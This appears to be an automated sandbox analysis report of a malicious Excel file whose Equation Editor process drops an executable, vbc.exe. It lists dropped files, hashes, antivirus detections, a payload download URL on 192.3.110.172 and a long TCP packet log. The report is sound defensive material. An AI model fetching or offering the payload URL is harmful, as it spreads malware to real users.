                                              SHA-256:2FFBB436257F6F348FADE42E94DF5737AB8B9D9848A220206992C52D917A7B5E
                                              SHA-512:EED60BDA2D0A5FB02F823DB8CAF57D136DC6D003F49CA7D3CB6A620DCB1CF4AD4E52C6B9A40AEFE9126F9E137776AE23D78A2648F5609FA3D69989AB3D185CC2
                                              Malicious:true
                                              Antivirus:
                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                              • Antivirus: ReversingLabs, Detection: 36%
                                              Joe Sandbox View:
                                              • Filename: TransportLabel_1189160070.xlsx, Detection: malicious
                                              Reputation:low
                                              IE Cache URL:http://192.3.110.172/000900/vbc.exe
                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\1F69C161.jpeg
                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                              File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 150x150, segment length 16, baseline, precision 8, 1275x1650, frames 3
                                              Category:dropped
                                              Size (bytes):85020
                                              Entropy (8bit):7.2472785111025875
                                              Encrypted:false
                                              SSDEEP:768:RgnqDYqspFlysF6bCd+ksds0cdAgfpS56wmdhcsp0Pxm00JkxuacpxoOlwEF3hVL:RUqQGsF6OdxW6JmPncpxoOthOip
                                              MD5:738BDB90A9D8929A5FB2D06775F3336F
                                              SHA1:6A92C54218BFBEF83371E825D6B68D4F896C0DCE
                                              SHA-256:8A2DB44BA9111358AFE9D111DBB4FC726BA006BFA3943C1EEBDA5A13F87DDAAB
                                              SHA-512:48FB23938E05198A2FE136F5E337A5E5C2D05097AE82AB943EE16BEB23348A81DA55AA030CB4ABCC6129F6EED8EFC176FECF0BEF4EC4EE6C342FC76CCDA4E8D6
                                              Malicious:false
                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\6AB87D1A.jpeg
                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                              File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 150x150, segment length 16, baseline, precision 8, 1275x1650, frames 3
                                              Category:dropped
                                              Size (bytes):85020
                                              Entropy (8bit):7.2472785111025875
                                              Encrypted:false
                                              SSDEEP:768:RgnqDYqspFlysF6bCd+ksds0cdAgfpS56wmdhcsp0Pxm00JkxuacpxoOlwEF3hVL:RUqQGsF6OdxW6JmPncpxoOthOip
                                              MD5:738BDB90A9D8929A5FB2D06775F3336F
                                              SHA1:6A92C54218BFBEF83371E825D6B68D4F896C0DCE
                                              SHA-256:8A2DB44BA9111358AFE9D111DBB4FC726BA006BFA3943C1EEBDA5A13F87DDAAB
                                              SHA-512:48FB23938E05198A2FE136F5E337A5E5C2D05097AE82AB943EE16BEB23348A81DA55AA030CB4ABCC6129F6EED8EFC176FECF0BEF4EC4EE6C342FC76CCDA4E8D6
                                              Malicious:false
                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\869DD99B.png
                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                              File Type:PNG image data, 1295 x 471, 8-bit/color RGBA, non-interlaced
                                              Category:dropped
                                              Size (bytes):68702
                                              Entropy (8bit):7.960564589117156
                                              Encrypted:false
                                              SSDEEP:1536:Hu2p9Cy+445sz12HnOFIr0Z7gK8mhVgSKe/6mLsw:O2p9w1HCIOTKEhQw
                                              MD5:9B8C6AB5CD2CC1A2622CC4BB10D745C0
                                              SHA1:E3C68E3F16AE0A3544720238440EDCE12DFC900E
                                              SHA-256:AA5A55A415946466C1D1468A6349169D03A0C157A228B4A6C1C85BFD95506FE0
                                              SHA-512:407F29E5F0C2F993051E4B0C81BF76899C2708A97B6DF4E84246D6A2034B6AFE40B696853742B7E38B7BBE7815FCCCC396A3764EE8B1E6CFB2F2EF399E8FC715
                                              Malicious:false
                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\9DE477EE.png
                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                              File Type:PNG image data, 737 x 456, 8-bit/color RGB, non-interlaced
                                              Category:dropped
                                              Size (bytes):83904
                                              Entropy (8bit):7.986000888791215
                                              Encrypted:false
                                              SSDEEP:1536:xNzYthYR7Iu3TjzBH8lXtvmNy2k8KYpNNNQ64nBLEMoknbRVmnN6:xNzUGxDjeOs2kSNSBh24
                                              MD5:9F9A7311810407794A153B7C74AED720
                                              SHA1:EDEE8AE29407870DB468F9B23D8C171FBB0AE41C
                                              SHA-256:000586368A635172F65B169B41B993F69B5C3181372862258DFAD6F9449F16CD
                                              SHA-512:27FC1C21B8CB81607E28A55A32ED895DF16943E9D044C80BEC96C90D6D805999D4E2E5D4EFDE2AA06DB0F46805900B4F75DFC69B58614143EBF27908B79DDA42
                                              Malicious:false
                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\AE98A654.emf
                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                              File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                              Category:dropped
                                              Size (bytes):498420
                                              Entropy (8bit):0.6411295525044179
                                              Encrypted:false
                                              SSDEEP:384:kXXwBkNWZ3cJuUvmWnTG+W4DH8ddxzsFfW3:WXwBkNWZ3cjvmWa+VDO
                                              MD5:E13FB0CF12ACB0DE77343AA8E634CE46
                                              SHA1:D34081BD6861817968A03A3EAB06B3779B5F4289
                                              SHA-256:8A8CA6BB15367EFC9FD076DFB139ADAC8C250E7019AED4DF21B823C827B82D50
                                              SHA-512:95094ED249C649C4D4679E27345EA0FA5934C1D64E641FCDD22A611753052AB8B5BA674CB41DEA6A3D80DCB0118B610EA83109800122FCCF57EF652C6C6E8219
                                              Malicious:false
                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\C2A0EB17.png
                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                              File Type:PNG image data, 413 x 220, 8-bit/color RGBA, non-interlaced
                                              Category:dropped
                                              Size (bytes):10202
                                              Entropy (8bit):7.870143202588524
                                              Encrypted:false
                                              SSDEEP:192:hxKBFo46X6nPHvGePo6ylZ+c5xlYYY5spgpb75DBcld7jcnM5b:b740IylZ+c5xlYF5Sgd7tBednd
                                              MD5:66EF10508ED9AE9871D59F267FBE15AA
                                              SHA1:E40FDB09F7FDA69BD95249A76D06371A851F44A6
                                              SHA-256:461BABBDFFDCC6F4CD3E3C2C97B50DDAC4800B90DDBA35F1E00E16C149A006FD
                                              SHA-512:678656042ECF52DAE4132E3708A6916A3D040184C162DF74B78C8832133BCD3B084A7D03AC43179D71AD9513AD27F42DC788BCBEE2ACF6FF5E7FEB5C3648B305
                                              Malicious:false
                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\CED8DC3D.png
                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                              File Type:PNG image data, 458 x 211, 8-bit/color RGB, non-interlaced
                                              Category:dropped
                                              Size (bytes):11303
                                              Entropy (8bit):7.909402464702408
                                              Encrypted:false
                                              SSDEEP:192:O64BSHRaEbPRI3iLtF0bLLbEXavJkkTx5QpBAenGIC1bOgjBS6UUijBswpJuaUSt:ODy31IAj0bL/EKvJkVFgFg6UUijOmJJN
                                              MD5:9513E5EF8DDC8B0D9C23C4DFD4AEECA2
                                              SHA1:E7FC283A9529AA61F612EC568F836295F943C8EC
                                              SHA-256:88A52F8A0BDE5931DB11729D197431148EE9223B2625D8016AEF0B1A510EFF4C
                                              SHA-512:81D1FE0F43FE334FFF857062BAD1DFAE213EED860D5B2DD19D1D6875ACDF3FC6AB82A43E46ECB54772D31B713F07A443C54030C4856FC4842B4C31269F61346D
                                              Malicious:false
                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\EE39EA45.png
                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                              File Type:PNG image data, 737 x 456, 8-bit/color RGB, non-interlaced
                                              Category:dropped
                                              Size (bytes):83904
                                              Entropy (8bit):7.986000888791215
                                              Encrypted:false
                                              SSDEEP:1536:xNzYthYR7Iu3TjzBH8lXtvmNy2k8KYpNNNQ64nBLEMoknbRVmnN6:xNzUGxDjeOs2kSNSBh24
                                              MD5:9F9A7311810407794A153B7C74AED720
                                              SHA1:EDEE8AE29407870DB468F9B23D8C171FBB0AE41C
                                              SHA-256:000586368A635172F65B169B41B993F69B5C3181372862258DFAD6F9449F16CD
                                              SHA-512:27FC1C21B8CB81607E28A55A32ED895DF16943E9D044C80BEC96C90D6D805999D4E2E5D4EFDE2AA06DB0F46805900B4F75DFC69B58614143EBF27908B79DDA42
                                              Malicious:false
                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F5161A2C.png
                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                              File Type:PNG image data, 1295 x 471, 8-bit/color RGBA, non-interlaced
                                              Category:dropped
                                              Size (bytes):68702
                                              Entropy (8bit):7.960564589117156
                                              Encrypted:false
                                              SSDEEP:1536:Hu2p9Cy+445sz12HnOFIr0Z7gK8mhVgSKe/6mLsw:O2p9w1HCIOTKEhQw
                                              MD5:9B8C6AB5CD2CC1A2622CC4BB10D745C0
                                              SHA1:E3C68E3F16AE0A3544720238440EDCE12DFC900E
                                              SHA-256:AA5A55A415946466C1D1468A6349169D03A0C157A228B4A6C1C85BFD95506FE0
                                              SHA-512:407F29E5F0C2F993051E4B0C81BF76899C2708A97B6DF4E84246D6A2034B6AFE40B696853742B7E38B7BBE7815FCCCC396A3764EE8B1E6CFB2F2EF399E8FC715
                                              Malicious:false
                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\FADACEE0.png
                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                              File Type:PNG image data, 458 x 211, 8-bit/color RGB, non-interlaced
                                              Category:dropped
                                              Size (bytes):11303
                                              Entropy (8bit):7.909402464702408
                                              Encrypted:false
                                              SSDEEP:192:O64BSHRaEbPRI3iLtF0bLLbEXavJkkTx5QpBAenGIC1bOgjBS6UUijBswpJuaUSt:ODy31IAj0bL/EKvJkVFgFg6UUijOmJJN
                                              MD5:9513E5EF8DDC8B0D9C23C4DFD4AEECA2
                                              SHA1:E7FC283A9529AA61F612EC568F836295F943C8EC
                                              SHA-256:88A52F8A0BDE5931DB11729D197431148EE9223B2625D8016AEF0B1A510EFF4C
                                              SHA-512:81D1FE0F43FE334FFF857062BAD1DFAE213EED860D5B2DD19D1D6875ACDF3FC6AB82A43E46ECB54772D31B713F07A443C54030C4856FC4842B4C31269F61346D
                                              Malicious:false
                                              C:\Users\user\AppData\Local\Temp\5xppu3pv9xau06i1l7h
                                              Process:C:\Users\Public\vbc.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):215509
                                              Entropy (8bit):7.993007159667604
                                              Encrypted:true
                                              SSDEEP:6144:hKN+7tjT1EoU/usg+EyYhHSP57+UsvQv3QjQhClksFCvB:CitHGhGsg+EpxY+UsYSkvB
                                              MD5:09E26957074F7239C0B27A193FD6CAD9
                                              SHA1:91B1CC7594C2800DA6A3FBEFB374DBEFC0B61869
                                              SHA-256:E8AC32511C468DB2F12B50DDE50345166EA845907E661091F2E64FA1EBE0D783
                                              SHA-512:A0408E836B50A0E7EFE1A1BC0D2A521275A37B25C7A72EDEBFA07EBBD7A453D90BBE7D28DFE3D7A7AC88D3E3A57E030E4986DC43DF378851BDED16D80BF9C55B
                                              Malicious:false
                                              C:\Users\user\AppData\Local\Temp\nsf86CE.tmp\dulsmde.dll
                                              Process:C:\Users\Public\vbc.exe
                                              File Type:PE32 executable (DLL) (native) Intel 80386, for MS Windows
                                              Category:dropped
                                              Size (bytes):108032
                                              Entropy (8bit):6.399774938239077
                                              Encrypted:false
                                              SSDEEP:1536:MOFgGAexpLuHJsu05OpmubCPMG9zpEENfuJSPRHKarriUCy3WklS9ncobUfs/MdL:hFgGA8uq9Bn1bJCyxlSrbMdyqWU
                                              MD5:9DCFA8231F1896CA0D48D53FB116841D
                                              SHA1:13F92A4AF7931B2AABD918D6D3CF4589E316331B
                                              SHA-256:6E1D37A9909F1774DB945F4427800E4D0B821FDCA41598F12DBA41B59FA3C901
                                              SHA-512:75D3A9FF265971C659444BD13FC28F90A77E0CE709A34A6C46F9EC75FD7F337DF5DBF5EC74B4129890B4B724E40AA10863F6D8D7E74A747CE7C5311F97513D09
                                              Malicious:false
                                              Antivirus:
                                              • Antivirus: ReversingLabs, Detection: 0%
                                              Joe Sandbox View:
                                              • Filename: dtMT5xGa54.exe, Detection: malicious
                                              • Filename: TransportLabel_1189160070.xlsx, Detection: malicious
                                              C:\Users\user\Desktop\~$Sajeeb09908976745344567.xlsx
                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):165
                                              Entropy (8bit):1.4377382811115937
                                              Encrypted:false
                                              SSDEEP:3:vZ/FFDJw2fV:vBFFGS
                                              MD5:797869BB881CFBCDAC2064F92B26E46F
                                              SHA1:61C1B8FBF505956A77E9A79CE74EF5E281B01F4B
                                              SHA-256:D4E4008DD7DFB936F22D9EF3CC569C6F88804715EAB8101045BA1CD0B081F185
                                              SHA-512:1B8350E1500F969107754045EB84EA9F72B53498B1DC05911D6C7E771316C632EA750FBCE8AD3A82D664E3C65CC5251D0E4A21F750911AE5DC2FC3653E49F58D
                                              Malicious:true
                                              Preview: .user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                              C:\Users\Public\vbc.exe
                                              Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                              Category:dropped
                                              Size (bytes):290617
                                              Entropy (8bit):7.9395134807721
                                              Encrypted:false
                                              SSDEEP:6144:wBlL/c7HU+ICkZsFE03JDT37iHxU1D/RmNOZeXBiFkJTstHJXd0mU:Ce7HUDCysO0dLiWDc8ZHKmHImU
                                              MD5:0031A23B4BB6ABCDCCC5F8122DE5FCB5
                                              SHA1:BE50CDBB0AF4C77229E3DE0EC7F34088AAE64DC2
                                              SHA-256:2FFBB436257F6F348FADE42E94DF5737AB8B9D9848A220206992C52D917A7B5E
                                              SHA-512:EED60BDA2D0A5FB02F823DB8CAF57D136DC6D003F49CA7D3CB6A620DCB1CF4AD4E52C6B9A40AEFE9126F9E137776AE23D78A2648F5609FA3D69989AB3D185CC2
                                              Malicious:true
                                              Antivirus:
                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                              • Antivirus: ReversingLabs, Detection: 36%
                                              Joe Sandbox View:
                                              • Filename: TransportLabel_1189160070.xlsx, Detection: malicious

                                              Static File Info

                                              General

                                              File type:CDFV2 Encrypted
                                              Entropy (8bit):7.9731887479499495
                                              TrID:
                                              • Generic OLE2 / Multistream Compound File (8008/1) 100.00%
                                              File name:Sajeeb09908976745344567.xlsx
                                              File size:328616
                                              MD5:ac493c2681477e3b56acbb570b8e41d9
                                              SHA1:2d9019b6c2f57c6360b155957cb542ae61bbf728
                                              SHA256:9efaa722d6e9df7c6628df6d1f49d14d858b60782db11c3f1e9b5037803b290b
                                              SHA512:a26f5e7baebdf77f54a9e8f1b109b4a9ac2ed74f33fca08f4014b1e185e87d446d2638dd4dff3ec67f229df3ad0bb592549e999851ea75fbd864e3c1df0fe024
                                              SSDEEP:6144:nPUVRB6666666rBkkoL6666664BoW303lddzlBGJOvZT7oz7Dqfd2QCwHPPQRUk2:PqH666666eBkxL6666664BoWE3lPcGZb

                                              File Icon

                                              Icon Hash:e4e2aa8aa4b4bcb4

                                              Network Behavior

                                              TCP Packets

                                              Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                              Oct 13, 2021 19:03:16.527893066 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:16.527908087 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:16.527923107 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:16.527937889 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:16.527946949 CEST4916580192.168.2.22192.3.110.172
                                              Oct 13, 2021 19:03:16.527952909 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:16.527971029 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:16.527985096 CEST4916580192.168.2.22192.3.110.172
                                              Oct 13, 2021 19:03:16.527987003 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:16.527998924 CEST4916580192.168.2.22192.3.110.172
                                              Oct 13, 2021 19:03:16.528002977 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:16.528002977 CEST4916580192.168.2.22192.3.110.172
                                              Oct 13, 2021 19:03:16.528007030 CEST4916580192.168.2.22192.3.110.172
                                              Oct 13, 2021 19:03:16.528009892 CEST4916580192.168.2.22192.3.110.172
                                              Oct 13, 2021 19:03:16.528017998 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:16.528023005 CEST4916580192.168.2.22192.3.110.172
                                              Oct 13, 2021 19:03:16.528033018 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:16.528040886 CEST4916580192.168.2.22192.3.110.172
                                              Oct 13, 2021 19:03:16.528047085 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:16.528062105 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:16.528070927 CEST4916580192.168.2.22192.3.110.172
                                              Oct 13, 2021 19:03:16.528075933 CEST4916580192.168.2.22192.3.110.172
                                              Oct 13, 2021 19:03:16.528089046 CEST4916580192.168.2.22192.3.110.172
                                              Oct 13, 2021 19:03:16.528279066 CEST4916580192.168.2.22192.3.110.172
                                              Oct 13, 2021 19:03:16.699848890 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:16.699883938 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:16.699898005 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:16.699914932 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:16.699939013 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:16.699959040 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:16.700030088 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:16.700047016 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:16.700062990 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:16.700123072 CEST4916580192.168.2.22192.3.110.172
                                              Oct 13, 2021 19:03:16.700159073 CEST4916580192.168.2.22192.3.110.172
                                              Oct 13, 2021 19:03:16.701845884 CEST4916580192.168.2.22192.3.110.172
                                              Oct 13, 2021 19:03:16.702322960 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:16.702358007 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:16.702382088 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:16.702405930 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:16.702425957 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:16.702450991 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:16.702476025 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:16.702478886 CEST4916580192.168.2.22192.3.110.172
                                              Oct 13, 2021 19:03:16.702498913 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:16.702512026 CEST4916580192.168.2.22192.3.110.172
                                              Oct 13, 2021 19:03:16.702517033 CEST4916580192.168.2.22192.3.110.172
                                              Oct 13, 2021 19:03:16.702522993 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:16.702532053 CEST4916580192.168.2.22192.3.110.172
                                              Oct 13, 2021 19:03:16.702534914 CEST4916580192.168.2.22192.3.110.172
                                              Oct 13, 2021 19:03:16.702548981 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:16.702557087 CEST4916580192.168.2.22192.3.110.172
                                              Oct 13, 2021 19:03:16.702573061 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:16.702581882 CEST4916580192.168.2.22192.3.110.172
                                              Oct 13, 2021 19:03:16.702600956 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:16.702605963 CEST4916580192.168.2.22192.3.110.172
                                              Oct 13, 2021 19:03:16.702625990 CEST4916580192.168.2.22192.3.110.172
                                              Oct 13, 2021 19:03:16.702626944 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:16.702649117 CEST4916580192.168.2.22192.3.110.172
                                              Oct 13, 2021 19:03:16.702651024 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:16.702668905 CEST4916580192.168.2.22192.3.110.172
                                              Oct 13, 2021 19:03:16.702675104 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:16.702692032 CEST4916580192.168.2.22192.3.110.172
                                              Oct 13, 2021 19:03:16.702697992 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:16.702713013 CEST4916580192.168.2.22192.3.110.172
                                              Oct 13, 2021 19:03:16.702722073 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:16.702744961 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:16.702769995 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:16.702775002 CEST4916580192.168.2.22192.3.110.172
                                              Oct 13, 2021 19:03:16.702796936 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:16.702821016 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:16.702825069 CEST4916580192.168.2.22192.3.110.172
                                              Oct 13, 2021 19:03:16.702846050 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:16.702869892 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:16.702876091 CEST4916580192.168.2.22192.3.110.172
                                              Oct 13, 2021 19:03:16.702881098 CEST4916580192.168.2.22192.3.110.172
                                              Oct 13, 2021 19:03:16.702898026 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:16.702922106 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:16.702925920 CEST4916580192.168.2.22192.3.110.172
                                              Oct 13, 2021 19:03:16.702945948 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:16.702969074 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:16.702970028 CEST4916580192.168.2.22192.3.110.172
                                              Oct 13, 2021 19:03:16.702996016 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:16.703021049 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:16.703021049 CEST4916580192.168.2.22192.3.110.172
                                              Oct 13, 2021 19:03:16.703027964 CEST4916580192.168.2.22192.3.110.172
                                              Oct 13, 2021 19:03:16.703032017 CEST4916580192.168.2.22192.3.110.172
                                              Oct 13, 2021 19:03:16.703044891 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:16.703068972 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:16.703073978 CEST4916580192.168.2.22192.3.110.172
                                              Oct 13, 2021 19:03:16.703093052 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:16.703195095 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:16.703221083 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:16.703228951 CEST4916580192.168.2.22192.3.110.172
                                              Oct 13, 2021 19:03:16.703236103 CEST4916580192.168.2.22192.3.110.172
                                              Oct 13, 2021 19:03:16.703239918 CEST4916580192.168.2.22192.3.110.172
                                              Oct 13, 2021 19:03:16.703243017 CEST4916580192.168.2.22192.3.110.172
                                              Oct 13, 2021 19:03:16.703243971 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:16.703246117 CEST4916580192.168.2.22192.3.110.172
                                              Oct 13, 2021 19:03:16.703248978 CEST4916580192.168.2.22192.3.110.172
                                              Oct 13, 2021 19:03:16.703252077 CEST4916580192.168.2.22192.3.110.172
                                              Oct 13, 2021 19:03:16.703253984 CEST4916580192.168.2.22192.3.110.172
                                              Oct 13, 2021 19:03:16.703270912 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:16.703295946 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:16.703298092 CEST4916580192.168.2.22192.3.110.172
                                              Oct 13, 2021 19:03:16.703303099 CEST4916580192.168.2.22192.3.110.172
                                              Oct 13, 2021 19:03:16.703316927 CEST4916580192.168.2.22192.3.110.172
                                              Oct 13, 2021 19:03:16.703316927 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:16.703342915 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:16.703344107 CEST4916580192.168.2.22192.3.110.172
                                              Oct 13, 2021 19:03:16.703365088 CEST4916580192.168.2.22192.3.110.172
                                              Oct 13, 2021 19:03:16.703387022 CEST4916580192.168.2.22192.3.110.172
                                              Oct 13, 2021 19:03:16.704371929 CEST4916580192.168.2.22192.3.110.172
                                              Oct 13, 2021 19:03:16.704704046 CEST4916580192.168.2.22192.3.110.172
                                              Oct 13, 2021 19:03:16.873879910 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:16.873908043 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:16.873920918 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:16.873933077 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:16.873954058 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:16.873970985 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:16.874036074 CEST4916580192.168.2.22192.3.110.172
                                              Oct 13, 2021 19:03:16.874064922 CEST4916580192.168.2.22192.3.110.172
                                              Oct 13, 2021 19:03:16.875070095 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:16.875092030 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:16.875197887 CEST4916580192.168.2.22192.3.110.172
                                              Oct 13, 2021 19:03:16.875330925 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:16.875468969 CEST4916580192.168.2.22192.3.110.172
                                              Oct 13, 2021 19:03:16.876471996 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:16.876698017 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:16.876756907 CEST4916580192.168.2.22192.3.110.172
                                              Oct 13, 2021 19:03:16.876780033 CEST4916580192.168.2.22192.3.110.172
                                              Oct 13, 2021 19:03:16.876904964 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:16.876929045 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:16.876945019 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:16.877113104 CEST4916580192.168.2.22192.3.110.172
                                              Oct 13, 2021 19:03:16.877120018 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:16.877136946 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:16.877156973 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:16.877173901 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:16.877199888 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:16.877219915 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:16.877237082 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:16.877253056 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:16.877268076 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:16.877284050 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:16.877300024 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:16.877315998 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:16.877331972 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:16.877351999 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:16.877351999 CEST4916580192.168.2.22192.3.110.172
                                              Oct 13, 2021 19:03:16.877361059 CEST4916580192.168.2.22192.3.110.172
                                              Oct 13, 2021 19:03:16.877363920 CEST4916580192.168.2.22192.3.110.172
                                              Oct 13, 2021 19:03:16.877367020 CEST4916580192.168.2.22192.3.110.172
                                              Oct 13, 2021 19:03:16.877368927 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:16.877383947 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:16.877401114 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:16.877415895 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:16.877430916 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:16.877448082 CEST8049165192.3.110.172192.168.2.22
